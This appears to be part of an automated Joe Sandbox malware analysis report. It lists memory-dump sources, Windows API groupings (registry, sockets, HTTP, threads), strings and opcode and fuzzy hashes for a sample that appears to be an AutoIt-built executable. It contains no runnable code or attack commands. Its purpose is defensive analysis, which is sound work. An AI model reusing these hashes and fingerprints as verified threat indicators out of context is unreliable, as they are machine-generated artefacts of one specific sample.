                                                            • Instruction Fuzzy Hash: 4BA18D32A08B8286EF60AF66E4505EDA7B0FB88B98F880536DE4D47754DF3CD545C790
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                            • String ID:
                                                            • API String ID: 1903627254-0
                                                            • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction ID: 1c75382ade9d2e83d4f43c2863ea5e4a5b95da5428fbf0fb2dec4b9b5fc40982
                                                            • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction Fuzzy Hash: D3023E62A08A8686DF90EF29E4841EDA770FB84B88F944532EF4E47764DF3CD549CB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                            • Instruction ID: b0b6f08a3e7970f45d5376adc620c61b76dd2808e1b86c45508a0a53a60bf6ef
                                                            • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                            • Instruction Fuzzy Hash: 1F210C76519B8182EB10DF52F4883A9BBA0F789FEAF484129DB9D07B54CF7CD1498710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 3721556410-2107944366
                                                            • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction ID: b31889257013bb89a4a612b92c33bad41ed0fb59f7c7b4e39cd363bccdf00d80
                                                            • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction Fuzzy Hash: 8F6180B6A14A9685EF00FF61E8805ED7B70FB44798F980136DE0D13AA5DF38E446C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 2$P
                                                            • API String ID: 93392585-1110268094
                                                            • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction ID: 67b6090443966a55f037c1b230bc5f9f9cd38badb14bc9c1304da1776aa6777f
                                                            • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction Fuzzy Hash: E251C232A086C2C9FF60AF65F4402FDB7A5BB40758FA84139DE5E57694DF39E8818720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: IconLoad_invalid_parameter_noinfo
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 4060274358-404129466
                                                            • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction ID: 4a55ad4a540e325470f31c4f6171e95abd302cabbaf2e6bdd6a5da0ba464db72
                                                            • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction Fuzzy Hash: 86213921A4CBC3C1EE54BB16B9105FAE355AF45790FC85031EE4D42695EF7CE842A760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 50796853-0
                                                            • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction ID: 2fc217e06833356d0fd5aac990891bfdef3d3d574084d8ea214a3dd5a37d3159
                                                            • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction Fuzzy Hash: 3BB15C72B0868286EF10FF65E0A03FCAB60AF85B84F894531DA4E57A96DF3CD105C764
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction ID: 2ad866647124f47cd1424c3e0048c271aa01a2c72e16e52317deb6fc8c5410a6
                                                            • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction Fuzzy Hash: 1A41CF766186C187EB24CB22B444BAABBA1F788BD1F584135EF8A43F54DF3DD4418B00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
                                                            • Instruction ID: 022d98bc1cd553b32d821b964e12e79c0eb53956214a98647f24dabf1464ec0a
                                                            • Opcode Fuzzy Hash: 6b437c51a0237620220ac28e62aa16d269046bb9e585148f6b23d7f034a1a3c0
                                                            • Instruction Fuzzy Hash: B7C1B222A0D6CA86FF64AF25B5402FEEB51AF40B80F994135DA4E07395CF3DE8418762
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction ID: 6ca35da8a514356c6cdb281e1b9bb550d0e68648661066e7770e65222b2df3c2
                                                            • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction Fuzzy Hash: 82A18926A18A8286FF14AF65E4943FCA760EF44B88F994431DF0E87695DF7CE481C760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction ID: d214eab0404e42804f83b4a5e8a580a2b28be08d2e5b8834c26ae4ce10010e1e
                                                            • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction Fuzzy Hash: 66A19E72A0C6C087EB24AF19B444AAEFB61FBC5B94F584125DA8917B68CF3CD442CF11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Enabled
                                                            • String ID:
                                                            • API String ID: 3694350264-0
                                                            • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction ID: 1b5cd4b6ad12f3c2738d6cef144d2953acccd38bf97c417201dc6438df3f3106
                                                            • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction Fuzzy Hash: F9917D21E496CA87FF74AA15A4543F9BB92BF84B94F9C403ACF4D03691CF2DE4918361
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction ID: 6319dae732b9daf53261105549e5388060f58a6d9cb365401feb24a40a6555c4
                                                            • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction Fuzzy Hash: B1518012A1D2D195FF61AB7161406BDAFA2FB46BC4FCD8074DA4A17B46CF19D852C330
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                            • Instruction ID: 4ac373eef3d5df7080f15cb790f3729fdf37307a887c98c7db542a1979e455ac
                                                            • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                            • Instruction Fuzzy Hash: 0D51B262A0C2D195FB61AB7161406FEAF61FB46FD0FCC8078DA8907E46CF18E8569331
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                            • String ID:
                                                            • API String ID: 3401586794-0
                                                            • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction ID: 0f0a18ee6d9e35c08307834c67f2b34330b1bc85680199cba94e22337480b627
                                                            • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction Fuzzy Hash: CD51B362A086C186EB14EF21B9416FEB7A0FB44BC8F984035DE0D07B48DF39D455C750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 668425406-1075368562
                                                            • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction ID: 0a0678a7f2f430996250a8537486888e8f930acbdd629515589ca566a7bb46e9
                                                            • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction Fuzzy Hash: F8518B22A18B86C2EF14AF26F9403B9A360FB48B84F988134DB4E47A45DF7CE455C724
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: LongMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 3360111000-0
                                                            • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                            • Instruction ID: bf0f065517ea7e1dbe7b910c0c29c20dbec4941bb09f974bf7bd1e96e4530d88
                                                            • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                            • Instruction Fuzzy Hash: C0416365A15A8A82EF60DB29E4906BCB751EBC4F94F984135CF1E47BA5CF3DE4418320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                            • Instruction ID: 6719404dea54b0a9e6334323d732e29b735f8d3f721cfd7e877a7299bb5881c6
                                                            • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                            • Instruction Fuzzy Hash: 8041A232A086C286EB60AF26B4542EDB360FB84BA4F984331DE5E43795DF3CD445C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID:
                                                            • API String ID: 161812096-0
                                                            • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction ID: 69b3f155567dfa53f1fad17a01e1c3c8c45083403827bceda8383ef5afcc3326
                                                            • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction Fuzzy Hash: FB414836A04B8586EB50DF62E8906EC77A1FB84B98F998036DF4E47764CF38E445C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction ID: 73dba6c6825e335ff68d00d753111a8673452563b9fe4daabfea686770d7960a
                                                            • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction Fuzzy Hash: 65417332A18BC586EB20DF11F4547EAA7A0FB89784F880135EB4D1BA58CF7DD149C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
